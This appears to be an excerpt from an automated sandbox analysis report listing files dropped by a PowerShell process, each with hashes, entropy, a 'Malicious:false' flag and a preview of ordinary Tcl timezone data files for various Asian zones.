                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Seoul) {.. {-9223372036854775808 30472 0 LMT}.. {-1948782472 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-767350800 32400 0 KST}.. {-681210000 36000 1 KDT}.. {-672228000 32400 0 KST}.. {-654771600 36000 1 KDT}.. {-640864800 32400 0 KST}.. {-623408400 36000 1 KDT}.. {-609415200 32400 0 KST}.. {-588848400 36000 1 KDT}.. {-577965600 32400 0 KST}.. {-498128400 30600 0 KST}.. {-462702600 34200 1 KDT}.. {-451733400 30600 0 KST}.. {-429784200 34200 1 KDT}.. {-418296600 30600 0 KST}.. {-399544200 34200 1 KDT}.. {-387451800 30600 0 KST}.. {-368094600 34200 1 KDT}.. {-356002200 30600 0 KST}.. {-336645000 34200 1 KDT}.. {-324552600 30600 0 KST}.. {-305195400 34200 1 KDT}.. {-293103000 30600 0 KST}.. {-264933000 32400 0 KST}.. {547578000 36000 1 KDT}.. {560883600 32400 0 KST}.. {579027600 36000 1 KDT}.. {592333200 32400 0 KST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):981
                                                                                                                                                                                                                              Entropy (8bit):4.16042656890735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Te3vvZJzHjwH6kHp7FH32AzHjZBHNHlQHuHxmHUjH6zHj2HBHeC:5ovZZO7lLpT24
                                                                                                                                                                                                                              MD5:A266AA43A84FD5E4890BC77AA4E240D0
                                                                                                                                                                                                                              SHA1:CD88C5D451CD7D3F50C9B36FDD47C84D20377441
                                                                                                                                                                                                                              SHA-256:3AABB42D9EFE95D906B7F34640E7815919A1A20979EBB6EC1527FCAA3B09B22A
                                                                                                                                                                                                                              SHA-512:13AE48F58C9AF24002F0FE4F28BF96B10EE0ED293E0DE9D29BCEBAAE102B2EA818F42CA4069544A254C95444A48604EC57E6AB2BEBDA4B5E72C82B49E61AD0A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Shanghai) {.. {-9223372036854775808 29143 0 LMT}.. {-2177481943 28800 0 CST}.. {-1600675200 32400 1 CDT}.. {-1585904400 28800 0 CST}.. {-933667200 32400 1 CDT}.. {-922093200 28800 0 CST}.. {-908870400 32400 1 CDT}.. {-888829200 28800 0 CST}.. {-881049600 32400 1 CDT}.. {-767869200 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-650016000 28800 0 CST}.. {515527200 32400 1 CDT}.. {527014800 28800 0 CST}.. {545162400 32400 1 CDT}.. {558464400 28800 0 CST}.. {577216800 32400 1 CDT}.. {589914000 28800 0 CST}.. {608666400 32400 1 CDT}.. {621968400 28800 0 CST}.. {640116000 32400 1 CDT}.. {653418000 28800 0 CST}.. {671565600 32400 1 CDT}.. {684867600 28800 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):372
                                                                                                                                                                                                                              Entropy (8bit):4.436676898144829
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKfbSDm2OHxdoHvm5vWOb/MVSYyF/3MesF5XJSx0dMVSSFF8kvScHS:MB862nbGmdHDCvsvDTMsF/CFDMx/HHbe
                                                                                                                                                                                                                              MD5:C3D13D921E4C6E475910E5080B761C32
                                                                                                                                                                                                                              SHA1:8C5AE73C4098D03908E5D567FD7C4D827601D718
                                                                                                                                                                                                                              SHA-256:05C76B58A4E356FD358E24FBC71FAE98DCB18C441C8D8CBB13A18D4F6E406062
                                                                                                                                                                                                                              SHA-512:3A620597469D31577ECAAA098C95C244F0C288ABACE9E8964D8641154C1893967EFBD7211A41751D0D4CC1B0B9A2286F11738EFB7D01F110A4826BBE1844A2EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Singapore) {.. {-9223372036854775808 24925 0 LMT}.. {-2177477725 24925 0 SMT}.. {-2038200925 25200 0 +07}.. {-1167634800 26400 1 +0720}.. {-1073028000 26400 0 +0720}.. {-894180000 27000 0 +0730}.. {-879665400 32400 0 +09}.. {-767005200 27000 0 +0730}.. {378664200 28800 0 +08}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2064
                                                                                                                                                                                                                              Entropy (8bit):3.7913177223006698
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5HJeidmbv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxwy:5HSv+0j6lua2Gg/3gO8UoOZU2Wc/pKf
                                                                                                                                                                                                                              MD5:B4FA38E884A85F6BD47C8BB02BB0500C
                                                                                                                                                                                                                              SHA1:1DD135B79CC0D81C048D7B2C6BE0CF71171DD19E
                                                                                                                                                                                                                              SHA-256:705D6D8360C2DCD51E909E39E1910FE876145220D151031612DA36B247207395
                                                                                                                                                                                                                              SHA-512:2D32AAAF1BCC865B5F2810BFE0FB82BE98140BB5F2ECA1DA7FD148A3074DA127B81242F17B8BA9C9E259B61CBB123FD1513CCE6A85C8D7679ADFC0D689B552BB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Srednekolymsk) {.. {-9223372036854775808 36892 0 LMT}.. {-1441188892 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1344
                                                                                                                                                                                                                              Entropy (8bit):4.062084847879695
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5X2eIvZPzGzHjZBHNHlQHKn3HnHNd9HiHkHBHaHLHMtyH9Qm+zHFOzHZ32HZvHiR:5Xi1ypBvt1mwO3Kq46T
                                                                                                                                                                                                                              MD5:AECA800C8F2A679D0B19E5BB90AFD858
                                                                                                                                                                                                                              SHA1:2C7DCEB709F9A4312C511971FE1E6A9DC1FBD0E8
                                                                                                                                                                                                                              SHA-256:389C9D3EE2970665D0D8C5CB61B8B790C5FBDDC0DF0BF2B9753046F5953A477F
                                                                                                                                                                                                                              SHA-512:C2D6BB4FEB5848D0704647D26F94C0BD8CD7E834AA2187EC9C877E80157E9CC225BBA3BECEE0148894C8639105D292AB50EE95830992BF357C632ACF001E020F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Taipei) {.. {-9223372036854775808 29160 0 LMT}.. {-2335248360 28800 0 CST}.. {-1017820800 32400 0 JST}.. {-766224000 28800 0 CST}.. {-745833600 32400 1 CDT}.. {-733827600 28800 0 CST}.. {-716889600 32400 1 CDT}.. {-699613200 28800 0 CST}.. {-683884800 32400 1 CDT}.. {-670669200 28800 0 CST}.. {-652348800 32400 1 CDT}.. {-639133200 28800 0 CST}.. {-620812800 32400 1 CDT}.. {-607597200 28800 0 CST}.. {-589276800 32400 1 CDT}.. {-576061200 28800 0 CST}.. {-562924800 32400 1 CDT}.. {-541760400 28800 0 CST}.. {-528710400 32400 1 CDT}.. {-510224400 28800 0 CST}.. {-497174400 32400 1 CDT}.. {-478688400 28800 0 CST}.. {-465638400 32400 1 CDT}.. {-449830800 28800 0 CST}.. {-434016000 32400 1 CDT}.. {-418208400 28800 0 CST}.. {-402480000 32400 1 CDT}.. {-386672400 28800 0 CST}.. {-370944000 32400 1 CDT}.. {-355136400 28800 0 CST}.. {-3394080
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                              Entropy (8bit):3.9280321712564845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5geQqdNRvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10Sv6r:5+EvdJqxiF0rvK50Sv6r
                                                                                                                                                                                                                              MD5:DB59DB8E401E12917B7367D5604D3DE6
                                                                                                                                                                                                                              SHA1:7CC7C5C1DB551BD381B833C81746201D36BC59A9
                                                                                                                                                                                                                              SHA-256:4445F3F892C7267A6867009CC1A3F0B0548D0240408375A9D15360B28993C2A9
                                                                                                                                                                                                                              SHA-512:2C7AE63C408A9F06F973AAC16845E1DBE92D15A421BBBE420914F21155AD5E57CD058D7E4427E43185E023D2FF475EBF9D74003ECEF004FF4E5F9D5681ADFB80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tashkent) {.. {-9223372036854775808 16631 0 LMT}.. {-1441168631 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1729
                                                                                                                                                                                                                              Entropy (8bit):3.6815162494646034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5yBeqvIdZlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPqUsx9Ul4N:5MmsUf8mFpNWFnytO6VnYK
                                                                                                                                                                                                                              MD5:C376C9ED66F6CC011E063D3E8E0DCED1
                                                                                                                                                                                                                              SHA1:13C6345F8CB0EC79FE7C78B156C5737BCB66E49E
                                                                                                                                                                                                                              SHA-256:B637BB0E49144C717E99E93540CB2C4D3695D63B91FE42547F2F0AA006498693
                                                                                                                                                                                                                              SHA-512:FD60192CBEDC91C5D6B3B5E6F19DEDCAE14DCF48DCAE6D4865A8F0BBDC01CBF8DAAE92C4C46C353AF5B3EEE36CCC87B23F193DDF221132F5404C42507B708364
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tbilisi) {.. {-9223372036854775808 10751 0 LMT}.. {-2840151551 10751 0 TBMT}.. {-1441162751 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {694213200 10800 0 +03}.. {701816400 14400 1 +03}.. {717537600 10800 0 +03}.. {733266000 14400 1 +03}.. {748
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2354
                                                                                                                                                                                                                              Entropy (8bit):3.666553647637418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Z2eendFalxbr1p4USUcESUUxSuEqzSUUongA3jJW3eY37U8uuZrc3cNWH1/ANzx:54G9SOSWzx1qcK83kv3OR0xV1ox
                                                                                                                                                                                                                              MD5:A7A174A14E51E0ACD7092D2A5AA50F99
                                                                                                                                                                                                                              SHA1:69ADDDDB68084B90819AD49A5230D5B0E1A9CD85
                                                                                                                                                                                                                              SHA-256:25870503A8A679DA13B98117BD473EAA0C79B094B85D3AD50629FF0946D5EACE
                                                                                                                                                                                                                              SHA-512:1ECFB558B13C94BDC848E7BBBB0CA1BB854BB12E112EBF306045EC14F00CE3E3C2DA51EBA8AF2D63C95D71B945647C3D9E9881158FE128DEBE940A742C4BFEB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tehran) {.. {-9223372036854775808 12344 0 LMT}.. {-1704165944 12344 0 TMT}.. {-1090466744 12600 0 +0330}.. {227820600 16200 1 +0330}.. {246227400 14400 0 +04}.. {259617600 18000 1 +04}.. {271108800 14400 0 +04}.. {283982400 12600 0 +0330}.. {296598600 16200 1 +0330}.. {306531000 12600 0 +0330}.. {322432200 16200 1 +0330}.. {338499000 12600 0 +0330}.. {673216200 16200 1 +0330}.. {685481400 12600 0 +0330}.. {701209800 16200 1 +0330}.. {717103800 12600 0 +0330}.. {732745800 16200 1 +0330}.. {748639800 12600 0 +0330}.. {764281800 16200 1 +0330}.. {780175800 12600 0 +0330}.. {795817800 16200 1 +0330}.. {811711800 12600 0 +0330}.. {827353800 16200 1 +0330}.. {843247800 12600 0 +0330}.. {858976200 16200 1 +0330}.. {874870200 12600 0 +0330}.. {890512200 16200 1 +0330}.. {906406200 12600 0 +0330}.. {922048200 16200 1 +0330}.. {937942200 12600
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.876713308636272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85zFFfXHAIgN0AzFFVHRL/2WFK+TT52WFKYzFgn:SlSWB9vsM3yZbPHAIgCAXRN/2wKsswKR
                                                                                                                                                                                                                              MD5:40B15013485EE2138A3DCB915F9121E7
                                                                                                                                                                                                                              SHA1:3ADBE38686C7CA1FDE3DDD12BE908F39BFD1E228
                                                                                                                                                                                                                              SHA-256:07537A30E6236D9E334DAFD5C4D352D25FDEF95D6DC7496F5D93EFAB74D9EBB1
                                                                                                                                                                                                                              SHA-512:DA3B7B44B3BEF07CA8AA5253BF684A838181D8A15D7CCF0447A6B5F5BAE28D155CF65BCFB6286EB36C0B9F4FDD1FE862A3297ADB6FC33532B9F766334283D725
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Jerusalem)]} {.. LoadTimeZoneFile Asia/Jerusalem..}..set TZData(:Asia/Tel_Aviv) $TZData(:Asia/Jerusalem)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.906503135441824
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8kNZ4WXHAIgNqFNKARL/2WFK9Z752WFKvNZovn:SlSWB9vsM3ykZ42HAIgc3KAN/2wKf126
                                                                                                                                                                                                                              MD5:081862B6FB33389BEC9B0E6B500AA342
                                                                                                                                                                                                                              SHA1:AF9467BB87C4C28921DF62A87B81223052F9FF4A
                                                                                                                                                                                                                              SHA-256:37459C17B59639DF62B3F3943751902CE6AAF1F11B7630069DB45052EBEFB5B9
                                                                                                                                                                                                                              SHA-512:CAF6F1C928528C4471229A2EF2944623545626532986628E6CE38884535286A0B38BA88C1A295E8B11322475D6BFAC61BF89786A76330C1A0C729339A3532BAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Thimphu)]} {.. LoadTimeZoneFile Asia/Thimphu..}..set TZData(:Asia/Thimbu) $TZData(:Asia/Thimphu)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.887493603495978
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKvNZJMXGm2OHEQUTFnoHqVaJKuc/v6Q61V9gmZVFSTVV:SlSWB9eg/2wKVZJDm2OHEfnoHDKuc/SC
                                                                                                                                                                                                                              MD5:F239452984CCA9F23E97A880652C39E6
                                                                                                                                                                                                                              SHA1:52D25282D03B79960F152D21E7492EE26DAEBBAA
                                                                                                                                                                                                                              SHA-256:B797C74E3840298C3CD8149FC8AA4BCE839EFE79E7C3310986FF23C965607929
                                                                                                                                                                                                                              SHA-512:1044BEDAE04FCA7BD62937AFCE70F6C447583A90DD1596C3029A64A8251E3F73C106F4D940548DD38E895D67FEFDCD196B257E11437DEB399085EE80C345AA50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Thimphu) {.. {-9223372036854775808 21516 0 LMT}.. {-706341516 19800 0 +0530}.. {560025000 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):388
                                                                                                                                                                                                                              Entropy (8bit):4.470556147950505
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862ymdHOx5CvAoK3zoiIxtoFDIe+zT0agbov:5yeOCvARzzCOVa/gby
                                                                                                                                                                                                                              MD5:3CCC15B63A882DB1B7459A51CD1C8165
                                                                                                                                                                                                                              SHA1:77A3EFE6E4EE524B9EC6F51593DD7521FD7B8DAD
                                                                                                                                                                                                                              SHA-256:3DA522FA88541A375D53F30A0B62DC4A305FA0315FEE534B7998C9E0A239450A
                                                                                                                                                                                                                              SHA-512:15238E96DABAB5D2B9FFD25B3F50417ED32205FA69239D6F6B28DA97A378D669FD409164964D0DD2A5B1D795C8F60E8D4EB15924046348C3D6010646A536E07C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tokyo) {.. {-9223372036854775808 33539 0 LMT}.. {-2587712400 32400 0 JST}.. {-683802000 36000 1 JDT}.. {-672310800 32400 0 JST}.. {-654771600 36000 1 JDT}.. {-640861200 32400 0 JST}.. {-620298000 36000 1 JDT}.. {-609411600 32400 0 JST}.. {-588848400 36000 1 JDT}.. {-577962000 32400 0 JST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2116
                                                                                                                                                                                                                              Entropy (8bit):3.695316005718174
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5CeLz/XJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEno:5H040yVRB7VfXucydm4IqtTTDOS
                                                                                                                                                                                                                              MD5:E95DE93CBCE72C5E02D7ECFE94C96308
                                                                                                                                                                                                                              SHA1:59A49EBFE544D97545BADFEFE716BB5659C64C20
                                                                                                                                                                                                                              SHA-256:6B64A01D0F0B5EC7A1410C3BD6883BA7CC133E9F073D40E8BFECE037E3A3FA24
                                                                                                                                                                                                                              SHA-512:9E33DC9C1C6D60F3226263C484AF46A14AAB31F838516A0D69BA08F8F416EF10D09697E8D7ABAC1CE1F5BCE8AB0C2635D99FBE70C89ECC268DED0DCE89E67466
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tomsk) {.. {-9223372036854775808 20391 0 LMT}.. {-1578807591 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7647084
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.897140749162557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8pYFfXHAIgNzGRRL/2WFKPQOrFJ4WFKov:SlSWB9vsM3yWFPHAIg0RN/2wKPQOrFJD
                                                                                                                                                                                                                              MD5:F6AE33D706C36FDD8A21F44AD59F5607
                                                                                                                                                                                                                              SHA1:94D6EC7A437249AEBE2FA4AF8AFB029A620368C0
                                                                                                                                                                                                                              SHA-256:732751845ACEDBFFD3C6170F4B94CB20B25BFDCFCC5EEA19F4BE439F5C5B573A
                                                                                                                                                                                                                              SHA-512:2314AB2B154887842211C9A570BC1323D9B4375FF60C96296835DB001E8A277CA62D40B8562BC34EDDF281D96D5325640B79F7907558C6E0319C7D2A76BE239C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Makassar)]} {.. LoadTimeZoneFile Asia/Makassar..}..set TZData(:Asia/Ujung_Pandang) $TZData(:Asia/Makassar)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1590
                                                                                                                                                                                                                              Entropy (8bit):3.7728141273024374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5IerIvusF7cCGK6zoCjZte3kzMjsBw0oZzlL98oysHqGzJvqE+ksabzdX+YjL:5VujmUCei46oljFC67
                                                                                                                                                                                                                              MD5:A4647294401D2B54ABAA8E509BF05A6F
                                                                                                                                                                                                                              SHA1:BF804CC38996D7715E3BA9BAD715D7ADBED781B9
                                                                                                                                                                                                                              SHA-256:A56A26981163A717CF388A423CFE7A2BAD1BE8652BE2E338670CBC0C0A70E5E9
                                                                                                                                                                                                                              SHA-512:B43157FABDE016FA6636CAB7B06CC1DEA53526B42FB46BB41DC4B7E48188D191C325BEF0D170B125E885F321C4316746A8D478D798828E2DC4A51C71DA4A610C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ulaanbaatar) {.. {-9223372036854775808 25652 0 LMT}.. {-2032931252 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 32400 1 +08}.. {433782000 28800 0 +08}.. {449596800 32400 1 +08}.. {465318000 28800 0 +08}.. {481046400 32400 1 +08}.. {496767600 28800 0 +08}.. {512496000 32400 1 +08}.. {528217200 28800 0 +08}.. {543945600 32400 1 +08}.. {559666800 28800 0 +08}.. {575395200 32400 1 +08}.. {591116400 28800 0 +08}.. {606844800 32400 1 +08}.. {622566000 28800 0 +08}.. {638294400 32400 1 +08}.. {654620400 28800 0 +08}.. {670348800 32400 1 +08}.. {686070000 28800 0 +08}.. {701798400 32400 1 +08}.. {717519600 28800 0 +08}.. {733248000 32400 1 +08}.. {748969200 28800 0 +08}.. {764697600 32400 1 +08}.. {780418800 28800 0 +08}.. {796147200 32400 1 +08}.. {811868400 28800 0 +08}.. {828201600 32400 1 +08}.. {843922800 28800 0 +08}.. {859
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.728285544456033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8TcXkXHAIgNrfcXORL/2WFKhrMEBQWFKucXB:SlSWB9vsM3yXHAIgTN/2wKhrMEewKX
                                                                                                                                                                                                                              MD5:D2EAEA6182FB332CAA707B523F6C8A9D
                                                                                                                                                                                                                              SHA1:3BFC654E2B3BCF902AF41AEEC46772C84FFF3890
                                                                                                                                                                                                                              SHA-256:D17FDAF17B3DAC3A1310E2332F61585598185E64CED799ABD68249EB5B698591
                                                                                                                                                                                                                              SHA-512:E16BEE28BFE3AFFFE6F0025C09D0D65001F38D5045AAB1B554E4D3A66A88273F985B7BAA11F8D26E76E5ABC9F559E3E4B794CC939AAD5FF012A5A47924D08CB3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ulaanbaatar)]} {.. LoadTimeZoneFile Asia/Ulaanbaatar..}..set TZData(:Asia/Ulan_Bator) $TZData(:Asia/Ulaanbaatar)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):5.006390440264841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKjhfMXGm2OHEVPoHsWA0GVFSTVVn:SlSWB9eg/2wKjJDm2OHEVPoH3A0CUX
                                                                                                                                                                                                                              MD5:D6245CAAEC9BA2579F4CEFFF196A9369
                                                                                                                                                                                                                              SHA1:4D182953F2CEEFF3583265F977B14F40C1A2FB43
                                                                                                                                                                                                                              SHA-256:C445B8030DEDDDED0AFF5CC692CC323B63BE8C14BBD42DC3FDE90AD4F9D14785
                                                                                                                                                                                                                              SHA-512:A32C477B6FAA79247907D1C4E2DF400B05AF4B529277C4CE12B33097872311E3F579115DC8CBA93DAC936928FD574414F3473A9CB7C8E85AB57CCA57489B60F8
